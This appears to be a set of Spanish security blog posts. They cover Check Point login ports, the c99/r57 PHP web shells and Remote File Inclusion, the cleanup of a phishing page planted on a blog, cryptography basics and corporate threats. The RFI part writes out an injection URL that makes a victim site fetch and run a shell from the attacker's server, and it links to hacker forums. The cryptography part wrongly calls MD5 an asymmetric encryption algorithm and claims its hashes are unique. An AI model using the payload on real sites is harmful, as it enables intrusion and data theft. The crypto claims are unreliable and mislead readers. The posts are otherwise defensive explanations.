Existen diferentes formas de conectar a un firewall Check Point , una de ellas es por VPN y otra por Cliente autentificado.

El que me interesa es el de Cliente autentificado y los puertos son :

• A nivel de DOS, vía telnet el puerto es el 259. Un ejemplo para activar en Windows es :  telnet 193.142.120.130 259
• A nivel de HTTP, vía Explorer el puerto es el 900. Un Ejemplo es : http://193.142.120.130:900

Cuando tocamos dichos puertos al Firewall nos abre una ventana de color verde (Muy fea), que nos pide Usuario y contraseña.Una vez autentificado nos abre una puerta (IP), vía NAT para poder llegar a una máquina en concreto según la configuración de las reglas del firewall Check Point.

Un Saludo de Telepieza.

Para solucionar dicha laguna iré explicando una serie de programas cogidos en un ordenador hackeado y a la vez con sus herramientas dejadas en el sistema por cerrar el firewall una vez dentro del servidor linux.

Son muchos los programas a exponer, pero vamos a empezar por dos programas PHPSHELL muy extendidos y son utilizados muy habitualmente por ellos (c99.txt o c99.php y el r57.txt o r57.php). La imagen corresponde al logo del c99.php.

Voy a ejecutar los programas en entorno Windows, pero lo suyo es en Linux, están más pensados en buscar y llevarse la información de vulnerabilidades de servidores con php , por ser dichos programas realizados en lenguaje PHP.

Dichos programas están catalogados en la técnica RFI (Remote File Inclusion) en español (Inclusión de Archivo remoto), se aprovecha de una vulnerabilidad en la programación de páginas web y que tengan instalado el modulo PHP, podemos insertar archivos añadiendo parámetros por la url del navegador. Si la instalación del php.ini está mal configurado, podemos hacer ejecutar nuestros archivos (c99.txt o r57.txt) en el servidor de la website o víctima.

Con un ejemplo se verá más claro:

http://www.victima.com/index.php?page=http://www.tuweb.com/c99.txt en dicho ejemplo renombramos  después a c99.php y ejecutar o http://www.victima.com/index.php?page=http://www.tuweb.com/c99.php? y ejecutas de forma automática.

Al insertar y ejecutar el programa desde nuestro servidor, ellos nos pueden ver todos nuestras carpetas de nuestra página web y analizar los tipos de ficheros y sus autorizaciones de lectura y escritura.

Si algunos de nuestros ficheros son de escritura, los agujeros más gordos a nivel de seguridad son :

• Nuestro index.html o index.php lo pueden alterar a su antojo.
• Redireccionar nuestra web cambiando el fichero .haccess
• Cambiar los datos de tu robots.txt.
• Añadir programas malignos para su ejecución en carpetas de escritura.
• Cambiar fotos, páginas y demás ficheros por otros.

Pero lo más grave aún no ha llegado, al poder entrar en tu sistema pueden visualizar los datos de los ficheros config.php o config.php.inc, dichos ficheros tienen la configuración del nombre, usuario y clave de acceso a la base de datos de nuestra aplicación.

Con dicha información y el programa del c99.php o r57.php se puede extraer todos los datos de la base de datos y llevarla a otro ordenador sin dejar rastro en el servidor, de esa forma el webmaster del Website no se percatará de la extración de datos y hackeo de su servidor.

Pero aún puede ser más grave, si dichas claves de la base de datos es igual a las claves de acceso a nuestro sistema o es un usuario de sistema con poder a Shell (root), a partir de aquí el dominio es total para nuestros hackers.

CONCLUSION Y SOLUCIONES:

• Ten los menos usuarios con Shell en tu sistema creados, como máximo dos uno el root (Linux) o Administrador (Windows) y otro de seguridad por si tienes problemas graves de entrada con los del sistema.
• Las contraseñas de dichos usuarios nunca tienen que ser colocadas en otros usuarios o repetidas en otros procesos como la Base de Datos MySql.
• Los usuarios de entrada a procesos de base de datos no pueden existir como usuarios de sistema.
• Limita las autorizaciones de los usuarios de tu base de datos a la mínima expresión para que no sean extraídos los datos de tu sistema de forma fácil si ellos consiguen la información por el fichero config.php
• Si tienes sistema operativo Windows, algunos anti-virus detectan como virus dichos programas, pero no es una garantía de seguridad.
• Si tienes sistema operativo Linux te aconsejo mirar el log del cron del usuario que arranca el apache. Los usuarios pueden ser apache, nobody o wwwrun. Ejecuta el comando : # crontab nobody -l o # crontab apache -l , si por casualidad te aparece algo parecido a : * * * * * * /var/tmp/nombreprograma es por tener un troyano y eliminalo de forma urgente, te han hackeado y van a por tí.

Pero no se me olvida lo más importante y es parametrizar bien tú php.ini y la solución para no activar dichos programas es indicar en la directiva “safe_mode = On”. en el fichero php.ini

El programa c99.php es muy extenso y tiene muchas funcionalidades, es cómo un pequeño programa phpMyAdmin pero con más funcionalidades aún.

Aquí tenemos una imagen del programa a nivel de cabecera, y podéis intuir las posibilidades tan grandes de información de dicho programa.

Para ver bien las imágenes picar encima de ella.

El programa en la cabecera ya intuimos todo su potencial y es :

• Información del Apache, S.O., SSL y PHP
• Información sobre la directiva safe-mode
• Los directorios del Apache son de Lectura, Escritura y Ejecución
• Capacidad del Disco para meter ellos sus programas
• Todos los Driver (Discos, Disketes, CD y demás dispositivos)
• Y un menú del todo sugerente (Ftp, Tools, Seguridad, Procesos, Sql, E-Mail, Directorios y demás herramientas)

Cada vez que picas en alguna opción del menú abajo te sale una consola con la información buscada y unos campos para introducir la información a extraer o consultar por el hacker.

Para mí el más dañino es el c99.php, pero el más sorprendente a nivel visual es el r57.txt por presentarse todo su potencial al arranque del programa, ves los datos a solicitar del FTP, E-MAIL y SQL en un sola ojeada. Los que saben de informática y son administradores se quedan impresionados por la foto visual del programa.

Para ver mejor la foto picar encima de la imagen, las he dividido en tres partes por no coger en el visualizador de la galería.

Datos que introduce el hacker para extraer o enviar información vía FTP

Datos a introducir el hacker para extraer o enviar información vía E-MAIL

Datos a introducir el hacker para extraer o consultar datos de nuestra Base de Datos, las bases de datos son mysql, mssql, postgresql.

Nota de Telepieza

Pero si quieres saber más sobre dicha técnica es mejor ir a los foros de los hacker y algunos de sus post son :

• Hoy toca explicar la técnica RFI (www.wf-zone.us/showthread.php)
• Video Tutorial de la técnica RFI (Video de Hackerarray.mforos.com)
• Gente discutiendo la técnica RFI (Foro de Discusión RFI)

…………………………. SALUDOS DE TELEPIEZA ………………….

Los correos electrónicos enviados tanto por el ISP pidiendo ser cerrado el sitio de acceso como el e-mail del propio banco son confidenciales, pero puedo extraer parte del documento cambiando alguna cosilla del e-mail y es :

We have detected a website hosted on your network that purports to be a Bank XXXXXXX website. We confirmed that this webpage is NOT authorized by Bank XXXXXXX and appears to be an unauthorized attempt to obtain our customers’ confidential information. Please send us any server logs or server side scripts that are associated with this fraudulent site. We request that you please assist us in shutting down the website:

URL = http://diminio.com/weblog/template/Boa/data/s.update/u.security/index.html

IP Address – 192.168.1.100

Please forward this message with your response, directly to anti-phishing@bancoenvioemail.com

While the unauthorized site is no longer a threat to our customers after your assistance with shutting it down, we also suggest that you replace your standard ‘shut down’ page with a redirect to our Bank XXXXXXXX

Page using the attached redirect code. By doing this, many ISPs have joined us in educating the public about Phishing and working toward combating the Phishing problem on the internet.

<html> <head>
<meta http-equiv=”REFRESH” content=”0;
URL=https://www.bankXXXXXXXX.com/privacy/Control.XXXXX?body=XXXXXX”>
</head> <body> </body> </html>

If you are unable to replace your shut down page with our redirect, we thank you in advance for taking action to shut down the unauthorized Bank XXXXXXXXX site.

Cómo mi amigo no se dedica a realizar phishing, me pidío ayuda y empece a indagar cómo le habían hackeado su web una pandilla de chorizos. Si investigas cómo actúan puedes saber más del mundo del hacker y de los phishing.

Según la indicación del e-mail del banco se han colocado en su blog y en la zona de template. La pregunta obligada es : ¿Qué distribución tienes de Weblog? La respuesta es : Serendipity y la siguiente pregunta ¿Qué sistema operativo utiliza? y la respuesta es : Linux distribución Red Hat.

El blog Serendipity es una distribución Open Source, cualquier inmortal con conocimientos de informática conoce su estructura de carpetas, la composición de las tablas de la Base de Datos y su vulnerabilidad en las carpetas temporales por ser de escritura y lectura como la carpeta template o template_c para grabar las páginas cache del blog.

La primera acción es colocar permisos de sólo lectura a dichas carpetas, y claro deja de funcionar el blog por falta de permisos.

La segunda acción es borrar la página web colocada por esos descerebrados y buscar más páginas como esas. Los hacker habian inundado de dicha páginas otros directorios escondidos dependientes de la carpeta raiz template o template_c.

La tercera acción es ir a buscar en la página web de Serendipity una nueva versión para ver si ha solucionado el agujero de seguridad y nos damos cuenta la inexistencia de dichas relises.

La cuarta acción es salvar la información de la Base de Datos y borrar con un rm -rf weblog todo el blog y todos sus directorios para cerrar el sitio por ser inseguro y de facíl acceso por los chorizos.

Cómo diria mi amigo “Matado el perro se acabo la rabia”.

Al ser un blog con copias de seguridad de Base de Datos todos los días, el sitio se volvera abrir en breve con otro tipo de distribución Open Source, la de Serendipity es muy mala para los blogueros y muy buena para los hacker.

Una vez dentro los hacker y localizado la estructura de las carpetas del sitio por no instalar bien el producto (Linux y Serendipity) , la única solución es eliminar y cerrar el blog, para volverlo a montar de nuevo con todas las garantias de seguridad. Eso significa formater el servidor y volver a empezar de nuevo instalando todos los productos con la maxima seguridad a nivel de permisos para no dar facilidades a los hacker.

¿Cómo Funcionan los hacker a nivel de Phishing en un sitio hackeado?

Ante todo tengo son muy listos, pero su forma de actuar es :

• Buscan un servidor con agujeros de seguridad tanto en el linux , apache o php.
• Una vez localizado a la victima (Website), intentan entrar por el puerto 80 y analizar las carpetas temporales de escritura y lectura para inyectar sus páginas index.html.
• Esperan unos días , semanas o meses y cuando ya están seguros de no ser pillados, empiezan a enviar e-mail a todo el mundo con la dirección del banco pero realmente es la dirección de la página web colocada en tú ordenador.
• Si algún infeliz teclea sus datos bancarios en el formulario, son enviados a los hacker dicho informe, pero el que queda constancia de hacer phishing es la página web hackeada.
• Los hacker de esa forma consiguen dos cosas, la primera no ser localizados y la segunda utilizar las líneas de comunicaciones de dichos website.

NOTA DE TELEPIEZA

Recomiendo a todo el mundo si instalan productos Open Source de colocar en todas las carpetas una página index.html realizado por vosotros, de esa forma es imposible de detectar la estructura de los directorios de vuestro WebSite.

Si trabajáis con PHP mirar la directiva “safe_mode = on” , se aconseja estar en on y no en off, algunas distribuciones de linux viene por defecto a off , del fichero de configuración php.ini del php

Saludos de Telepieza.

 Vamos a explicar de forma general, cuatro algoritmos de la criptografía (DES, IDEA, RSA y MD5.) son secuencias parcialmente complejas de operaciones que sirven para codificar y decodificar un texto o una cadena binaria.

 Dichos algoritmos de entrada reciben una clave que representa el secreto en sí e influye en el cálculo de los datos codificados. Para poder descodificar dichos mensajes necesitamos la clave utilizada anteriormente.

 Los algoritmos de codificación como el DES (Data Encryption Standars) con 56 bits el espacio para claves es de (7 *10^{16)  ,} en IDEA (International Data Encryption Algorithmus) con 128 bits es de (3,4 * 10^38).

  Los algoritmos (DES e IDEA) son simétricos, eso significa que tanto el codificador y el decodificador utilizan la misma clave. Dicha técnica no es aconsejable para el mundo de internet.

 Si codificamos un texto en un ordenador con dichos algoritmos y lo enviamos por internet a otro ordenador, para que lo pueda descodificar, también tenemos que enviar la clave por la red y eso no es nada aconsejable. Para poder descodificar dichos mensajes el envío de la clave tiene que ser por medios tradicionales, por ejemplo correo ordinario o mensajero.

 Para el mundo de internet existen los algoritmos asimétricos.  En ellos se utiliza para codificar una clave distinta a la que se utiliza para decodificar y aquí ha logrado gran difusión el algoritmo RSA y MD5 es Open Source y deseñado por Ron Rivest uno de los ingenieros de la compañia RSA.

  Por lo tanto, Internet es el terreno ideal para los algoritmos de codificación asimétricos (RSA y MD5), que permiten la codificación y la decodificación con dos claves distintas. En el marco de los sistemas “Public Key” se dan dos claves a cada participante: una pública y una privada. La clave pública puede y debe transmitirse hacia el exterior, puesto que se trata de la clave con la que un remitente ha codificado una carta para el destinatario en cuestión: con su clave pública. El destinatario puede obtener esta clave por correo electrónico, por correo normal o por teléfono, o bien, en una base de datos de Internet, en la que se pueden depositar claves públicas libremente.

  Sin embargo, la clave pública no vale para decodificar el mensaje. Esto sólo puede hacerse con la clave privada del destinatario en cuestión, por lo que éste debe guardarla como una pequeña reliquia. La gran ventaja de este método de hecho es que uno sólo tiene que generar algunas claves privadas y públicas para poder recibir correo codificado de cualquier persona en la red, al cual sólo podrá acceder a través de su clave privada.

 Existe el algoritmo Hash del modelo MD5 o firma digital. La firma digital es poder acreditar la integridad y la autenticidad de un documento, así como la autoría del remitente. La firma debe ser tan unívoca que no pueda volver a utilizarse para otro documento. Así pues, debe derivarse de alguna manera del documento en sí y de su contenido.

  Las más adecuadas para ello son las funciones “One-Way Hash”: que condensan una información en una dirección, pero en otra dirección no permiten deducir la información original.

  El MD5 genera, a partir de un texto de cualquier longitud, una clave de 128 bits que es única para ese texto. Con sólo cambiar un carácter, se obtiene un valor muy distinto en el cálculo del MD5.

 Los pasos a seguir en un mensaje con firma digital son:

• El remitente calcula el valor Hash de su mensaje, lo codifica con su clave privada y lo agrega al mensaje.
• A continuación, codifica el mensaje completo con la clave pública del destinatario.
• El mensaje viaja a través de Internet.
• Llegado al destinatario, éste decodifica el documento con su clave privada.
• Decodifica la firma agregada con el valor Hash a través de la clave pública del remitente.
• El destinatario calcula el valor Hash del mensaje y lo compara con el valor Hash de la firma decodificada del remitente. Sólo si ambos son idénticos, el mensaje será auténtico y no modificado.

En proximas entradas explicaremos cada uno de los algoritmos en profundidad.

  En el afán de seguridad, las empresas invierten muchos millones de euros al año en software, licencias, máquinas y líneas de comunicaciones, para poder dar un servicio y una seguridad en el flujo de información entre nuestras organizaciones sin precedentes en el mundo actual.

  Pero aún teniendo uno de los mejores planes de seguridad, la ciencia no es exacta y los llamados virus, troyanos, espías, escuchadores, spam y gusanos con su evolución de superación informática, vía localizar entradas ocultas en los sistema operativos, nuevas técnicas de programación o una evolución natural del propio software maligno, pueden colarse en nuestros sistemas informáticos y debilitar nuestra red e infectar nuestros ordenadores con la consiguiente pérdida económica para toda nuestra compañía.

TOMAR MEDIDAS

 La llegada masiva de correo no deseado, virus e infección de ordenadores por Internet y siendo una de las mayores preocupaciones de los responsables de la compañía y sus clientes, tenemos que planificar de forma estratégica la seguridad de toda la red a nivel corporativo, incluyendo a todos los implicados tanto dentro y fuera de la compañía. Los trabajadores,  clientes y proveedores en su primera fase de control de seguridad, controlar el acceso a la red vía navegación y los correos electrónicos.

 Para poder estar un poco tranquilo, tenemos que colocar un Firewall, un Antivirus y un Anti Spam entre la Intranet y la Internet, para poder controlar todos los flujos de comunicaciones entre el exterior y el interior de nuestra compañía.

 El decir Firewall, Antivirus y Anti Spam, es comprar unos o dos ordenadores según el tráfico de comunicaciones que tenga nuestra red a nivel interno y externo.

 Pero dicha inversión costosa no garantiza en ningún momento que no entren virus en nuestra compañía, para ello, tenemos que adquirir otro Antivirus y colocarlo en todos nuestros ordenadores o puestos de trabajo de la compañía.

  El motivo es porque últimamente todo el mundo tiene OpenDriver, CD, DVD, y demás dispositivos que son introducidos en los ordenadores del puesto de trabajo para poder visualizar su contenido y pueden estar infectados. La infección no viene desde fuera sino que es introducida desde dentro por una persona de confianza de la compañía.

 Se dice que el peor hacker lo tenemos dentro de nuestra compañía, con tantos dispositivos diferentes no es de extrañar que sea así de real y nuestra seguridad e inversión no este garantizada.

 El virus ideal (Desde el punto de vista de los autores de virus) sería aquél que se propaga de forma sigilosa, sin que nadie lo advierta, e inicia su actividad destructiva una vez que los ordenadores se encuentran ya infectados.

  El principal objetivo de los virus es la información contenida en los ordenadores.

  Esta información puede tratarse tanto de trabajos realizados (textos, imágenes, bases de datos, hojas de cálculo…), como de programas instalados en el ordenador.

  Cuando se abre o ejecuta un archivo infectado por un virus, este último se activa y comienza sus operaciones. En otras ocasiones, minada condición, o que llegue una determinada fecha para activarse.

MECANISMOS

  Cada tipo de virus emplea diferentes mecanismos, tanto para realizar sus infecciones como para llevar a cabo sus objetivos. En ocasiones, incluso utilizan combinaciones de varias técnicas.

 Ocultamiento: Estos virus se camuflan o esconden, para no levantar sospechas.

 Autocifrado:    El virus codifica (o cifra) su firma (las características por las que se le identifica). Esto también hace difícil que el programa antivirus lo detecte.

 Polimorfismo:  Esta técnica permite al virus realizar su infección de forma diferente en cada ocasión, lo cual dificulta el trabajo de detección que realizan los programas antivirus.

 Armouring:     El virus impide ser examinado por los programas antivirus.

LA MAYOR PLAGA EN INTERNET

  La mayor plaga de Internet es el correo basura (en inglés también conocido como junk-mail o spam) a una cierta forma de inundar la red con muchas copias (incluso millones) del mismo mensaje, en un intento por alcanzar a gente que de otra forma nunca accedería a recibirlo y menos a leerlo.

 Muchos de esos correos basura está constituido por anuncios comerciales, normalmente de productos dudosos, medicamentos (por ejemplo el viagra), métodos para hacerse rico o servicios en la frontera de la legalidad. No deja de amargar la existencia a los usuarios de Internet cuando encuentran sus buzones rebosando con correos del estilo:

            Gane millones trabajando desde casa.

            Chicas XXX ardientes te están esperando.

  Las listas de correo basura con las direcciones de correo electrónico de los clientes potenciales se crean frecuentemente cribando los mensajes de usenet, robando direcciones en las listas de distribución, buscando la información de nuestras páginas web o comprándolas en las bases de datos de los servicios en línea de Internet o bien buscando direcciones por la red.

  Pero la plaga aún crece día a día y los propios operadores de Internet las ISP, activan listas de direcciones no deseadas para que sus clientes al comprobar que están en dichas listas no les llegue correo basura a sus buzones.

 Las operadoras de Comunicaciones y de Internet están realizando un gran esfuerzo para que los correos basura no bloqueen los anchos de banda de sus propias redes de comunicaciones. La realidad es que si sigue así el incremento de correo basura, internet no tendrá sentido por ser ineficaz al no dar servicio y rapidez a los internautas.

LOS ORDENADORES NO PIENSAN.

  Los ordenadores están pensados para dar contestación a la demanda del operador o usuario, para eso se han creado dichas máquinas y sus servicios asociados para dar respuesta al ser humano, al fin y al cabo, son máquinas llenas de silicio y demás componentes electrónicos.

 Pero si esa lógica de dar servicio, cientos o miles de ordenadores atacan a la vez a un servidor en concreto, tantas peticiones hacen que el ordenador deniegue el servicio o se bloquee.

  Dicha teoría de denegar servicios o bloqueo del sistema o servidor es una de las más preocupante de los responsables de seguridad, el motivo es muy sencillo, los ordenadores están pensados para contestar siempre y ahí es donde radica nuestro problema más serio, más que los propios virus que están por la Red.

NUESTRAS LINEAS DE COMUNICACIONES.

 El responsable de Comunicaciones, puede controlar las maquinas que están a su control (router, servidores, hub, swiches, ordenadores ……), pero fuera existen las líneas de comunicaciones que dependen de la operadora contratada y no controladas por el responsable informático de la compañía.

 Otro de los grandes problemas de seguridad en la actualidad es la saturación de la línea de comunicaciones por empresas especializadas en bloquear dichas líneas para su beneficio propio.

 Si las líneas de comunicaciones están saturadas, nuestros servicios más esenciales no funcionan, por ejemplo, conectar con otras sedes, enviar correo electrónico al exterior, navegar por internet y demás comunicaciones.

  CONCLUSIONES.

 Estaría escribiendo más y más sobre Seguridad, pero creo que dicho artículo puede dar una idea de que no sólo existen malos fuera , sino que dentro de nuestra compañía también los tenemos.

 Los grandes problemas de seguridad no son los programas que realizan los llamados “MALOS”, sino que tenemos otro tipo de problemas como la denegación de servicios y la saturación de nuestras líneas de comunicaciones.

  Pero el reto más importante para los responsables de seguridad, es que las pequeñas infecciones crean un gran agujero de seguridad en nuestra compañía.

Me voy a explicar con un ejemplo:

 Si como usuario tiene en un Ordenador un simple programa malicioso sin importancia , por ejemplo un espía, en otro me llega un montón de correo basura, en un servidor de la compañía se bloquea algunas veces un servicio, nuestra línea de comunicaciones la tenemos al 90% algunas horas del día y va lenta, y así hasta más y más …….., eso significa que estamos siendo atacados en pequeñas escalas asumidas por los recursos de nuestra compañía, pero la realidad es que :

  ESTAN SIENDO ATACADOS NUESTROS SISTEMAS INFORMATICOS Y LINEAS DE COMUNICACIONES Y NO EXISTE REMEDIO EN LA ACTUALIDAD PARA EVITARLO.
 

 Es así de duro y claro, los programas actuales tanto los firewall como los anti-todo, no son capaces de parar los ataques a pequeña escala hacia nuestros sistemas y líneas de comunicaciones, si tenemos muchos ataques a pequeña escala eso significa  …  (TU MISMO, IMAGINA LO QUE SIGNIFICA).